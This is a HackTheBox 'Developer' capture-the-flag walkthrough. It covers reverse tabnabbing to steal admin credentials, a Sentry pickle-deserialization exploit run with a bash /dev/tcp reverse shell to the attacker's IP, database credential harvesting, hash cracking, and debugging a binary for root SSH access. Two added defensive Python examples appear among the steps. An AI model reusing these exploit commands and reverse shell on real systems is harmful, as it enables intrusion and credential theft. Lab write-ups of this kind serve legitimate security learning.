HackTheBox – Developer Walkthrough
┌──(rootkali)-[/home/kali/Downloads]
└─# nmap -p- -T4 10.10.11.103
output: 22, 80
┌──(rootkali)-[/home/kali/Downloads]
└─# nmap -sC -sV -p22,80 10.10.11.103
http://developer.htb
┌──(rootkali)-[/home/kali/Downloads]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/raft-large-words.txt -u http://developer.htb
http://developer.htb/accounts/signup/
┌──(rootkali)-[/home/kali/Downloads]
└─# unzip phished_list.zip
┌──(rootkali)-[/home/kali/Downloads]
└─# unzip phished_credentials.xlsx
We get the flag with a quick grep for a common flag scheme.
┌──(rootkali)-[/home/kali/Downloads]
└─# grep -iRe '{.*}'
Flag: DHTB{H1dD3N_C0LuMn5_FtW}
Going to our profile we see that we now have a walkthrough submitted. Checking the page source for the link, we see that clicking it opens a new tab with target="_blank". This makes it susceptible to reverse tabnabbing: because the link sets no rel="noopener", the page that opens in the new tab can navigate the original (opener) tab through window.opener.
After about a minute we get a hit on our listener with a Firefox user agent, which means the submitted link is probably being checked with a real browser.
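As an added example that is not part of the original walkthrough, the check a site owner would run for the condition exploited above: a Python audit that flags target="_blank" anchors lacking rel="noopener" or "noreferrer", plus a helper that produces the hardened rel value. The HTML sample is constructed.

```python
from html.parser import HTMLParser

# rel tokens that sever window.opener; noreferrer implies noopener in modern browsers
SAFE_REL = {"noopener", "noreferrer"}


class BlankTargetAuditor(HTMLParser):
    """Collects every <a target="_blank"> whose rel lacks noopener/noreferrer."""

    def __init__(self):
        super().__init__()
        self.unsafe = []  # hrefs whose target page can reach window.opener
        self.safe = []    # hrefs already hardened

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("target", "").lower() != "_blank":
            return
        rel = set(a.get("rel", "").lower().split())
        (self.safe if rel & SAFE_REL else self.unsafe).append(a.get("href", ""))


def find_tabnabbable_links(html: str) -> list:
    """Return hrefs of new-tab links that a hosted page could abuse via window.opener."""
    auditor = BlankTargetAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.unsafe


def hardened_rel(rel: str) -> str:
    """Return the rel value with noopener and noreferrer added, keeping existing tokens."""
    tokens = rel.split()
    for needed in ("noopener", "noreferrer"):
        if needed not in tokens:
            tokens.append(needed)
    return " ".join(tokens)


# Constructed sample resembling a profile page: one unhardened and one hardened external link.
SAMPLE_HTML = """
<ul class="walkthroughs">
  <li><a href="http://walkthroughs.example/user1.html" target="_blank">Submitted walkthrough</a></li>
  <li><a href="https://docs.example/intro" target="_blank" rel="noopener noreferrer">Docs</a></li>
  <li><a href="/accounts/profile/">Profile</a></li>
</ul>
"""

if __name__ == "__main__":
    for href in find_tabnabbable_links(SAMPLE_HTML):
        print("tabnabbable:", href, "-> use rel=\"%s\"" % hardened_rel(""))
```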
┌──(rootkali)-[/home/kali/Downloads]
└─# python3 -m http.server 80
┌──(rootkali)-[/home/kali/Downloads]
└─# python3 -m http.server
┌──(rootkali)-[/home/kali/Downloads]
└─# tcpdump -i tun0 -nt -A
Link of walkthrough : http://10.10.14.55/evil.html
On tcpdump we get this.
Voila, the credentials are (admin:SuperSecurePassword@HTB2021). Armed with the credentials, we can now log in to the Django administration site.
http://developer.htb/admin/login/?next=/admin/
Clicking on Sites here, we can see that Django is serving two sites.
I'd better add developer-sentry.developer.htb to /etc/hosts as well. This is what the Sentry site looks like.
http://developer-sentry.developer.htb/auth/login/sentry/
Click on member.
We can see that jacob@developer.htb is a member of the site. Perhaps the password SuperSecurePassword@HTB2021 will work for this username as well?
Authenticated Remote Code Execution in Sentry
The first thing I notice is that this Sentry is old. The current Sentry release is 21.8.0!!!
Oh boy, do I have the right exploit for this. The following Python code helps generate the poisonous pickle that is deserialized from the data field of an audit log entry.
https://www.exploit-db.com/exploits/50318
https://doc.lagout.org/Others/synacktiv_advisory_sentry_pickle.pdf
┌──(rootkali)-[/home/kali/Downloads]
└─# python2 exploit.py "/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.55/1234 0>&1'"
Output:
eJwVi0EKgCAQAO/7Ck/pJVdTO/qGqBeoCQVRS1bvT2EOw8Ck8ka6r5RLgemifAJpEOKgARaOcT8xhrJxIANh4X2qZpu1yvqd+Y7hmj98EqFWsmGlc6gHY5nyna6Dg/DMNIL8AejnHXE=
http://developer-sentry.developer.htb/admin/sentry/auditlogentry/add/
Hit Save and you'll see your shell.
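As an added example that is neither the walkthrough's code nor Sentry's, the defensive side of the bug above: a scan that rejects pickle streams containing code-loading opcodes before anything is deserialized, and an Unpickler that refuses to resolve any global. Both sample payloads are constructed with pickle.dumps.

```python
import io
import pickle
import pickletools

# Opcodes that let a pickle import or call code; plain data (dicts, lists, str, int) never needs them.
DANGEROUS_OPCODES = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "REDUCE", "BUILD"}


def dangerous_opcodes(data: bytes) -> list:
    """Return the code-loading opcodes present in a pickle stream, without executing it."""
    found = []
    for opcode, _arg, _pos in pickletools.genops(data):
        if opcode.name in DANGEROUS_OPCODES:
            found.append(opcode.name)
    return found


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that never resolves module.name references, so no class or function is loaded."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"refusing to load global {module}.{name}")


def restricted_loads(data: bytes):
    """Deserialize only pure-data pickles; anything referencing a global raises UnpicklingError."""
    if dangerous_opcodes(data):
        raise pickle.UnpicklingError("pickle contains code-loading opcodes")
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_safe_pickle(data: bytes) -> bool:
    """True if the stream deserializes under the restricted loader, False otherwise."""
    try:
        restricted_loads(data)
        return True
    except (pickle.UnpicklingError, ValueError):
        return False


# Constructed samples: an audit-log-like data dict, and a stream that references a function by name.
SAFE_PAYLOAD = pickle.dumps({"event": "user.login", "ip": "192.0.2.10", "ok": True})
GLOBAL_PAYLOAD = pickle.dumps(len)  # harmless builtin, but it exercises the global-loading path

if __name__ == "__main__":
    print(restricted_loads(SAFE_PAYLOAD))
    print(dangerous_opcodes(GLOBAL_PAYLOAD), is_safe_pickle(GLOBAL_PAYLOAD))
```

Sentry stores audit-log data as a pickled, compressed, base64 string (the eJw... prefix above is zlib), so in practice the scan would run after base64 and zlib decoding.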
www-data@developer:/var/sentry$ cd /etc
www-data@developer:/etc$ cd sentry
www-data@developer:/etc/sentry$ cat sentry.conf.py
www-data@developer:/etc/sentry$ psql sentry sentry -h localhost -W
Password: SentryPassword2021
\d+
select * from auth_user;
Since karl is the admin and also a user on the machine, we try cracking his password hash (Django PBKDF2-SHA256, hashcat mode 10000) first, and are successful.
┌──(rootkali)-[/home/kali/Downloads]
└─# hashcat -m 10000 -O hash rockyou.txt
Password: insaneclownposse
┌──(rootkali)-[/home/kali/Downloads]
└─# ssh karl@developer.htb
karl@developer:~$ file /root/.auth/authenticator
┌──(rootkali)-[/home/kali/Downloads/test]
└─# scp karl@developer.htb:/root/.auth/authenticator .
https://github.com/pwndbg/pwndbg
┌──(rootkali)-[/home/kali/Downloads/test]
└─# gdb authenticator
pwndbg> start
pwndbg> b *0x55555555bfec
pwndbg> c
pwndbg> s
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
From the output above we copy this address: 0x555555582df0.
Back at the password prompt, enter 123456.
Now delete all previously set breakpoints.
pwndbg> d br
pwndbg> b *0x555555582df0
Now run it again.
pwndbg> r
pwndbg> c
Here simply press Enter.
pwndbg> r
pwndbg> s
Address: 0x55555555b204
Now delete the breakpoint again.
pwndbg> d br
pwndbg> b *0x55555555b204
pwndbg> r
pwndbg> s
pwndbg> n
pwndbg> d br
pwndbg> b *0x55555555b231
pwndbg> r
To step into this function, use 's'.
pwndbg> s
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
Now we finally reach a call instruction.
Nothing interesting here: this call takes its argument through rbx, and rbx does not point at anything interesting, so we keep stepping in search of another call.
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
Here we see something interesting: a call to std::io::stdio::Stdin::read_line.
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> d br
pwndbg> b *0x55555555b876
pwndbg> r
pwndbg> s
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
Concentrate on the call to <crypto::aes::ctr>.
Here we can see that the crypto in use is AES.
pwndbg> d br
pwndbg> b *0x55555555b936
pwndbg> r
Once we enter the password 123456, all the registers hold values. Now we inspect them as hex:
pwndbg> hex $rax
pwndbg> hex $rcx
pwndbg> hex $rsi
Search: cyberchef aes
Now we know the cipher is AES and the mode is CTR (where decryption is the same operation as encryption). These are the inputs:
AES Encrypt:
a3 e8 32 34 5c 79 91 61 9e 20 d4 3d be f4 f5 d5
KEY:
76 1f 59 e3 d9 d2 95 9a a7 98 55 dc 06 20 81 6a
Input:
fe 1b 25 f0 80 6a 97 ca 78 80 fd 58 fc 5c 20 23 6c a2 db d0 e5 02 b5 fa eb c0 af 3a 9f 27 15 2c
Here we get the output "RustForSecurity@Developer@2021:)".
Key:
ssh-rsa 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 root@kali
karl@developer:~$ sudo /root/.auth/authenticator
Enter your password to access the super user:
RustForSecurity@Developer@2021:)
Enter your SSH public key in now:
ssh-rsa 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 root@kali
┌──(rootkali)-[/home/kali/Downloads]
└─# ssh -i /root/.ssh/id_rsa root@developer.htb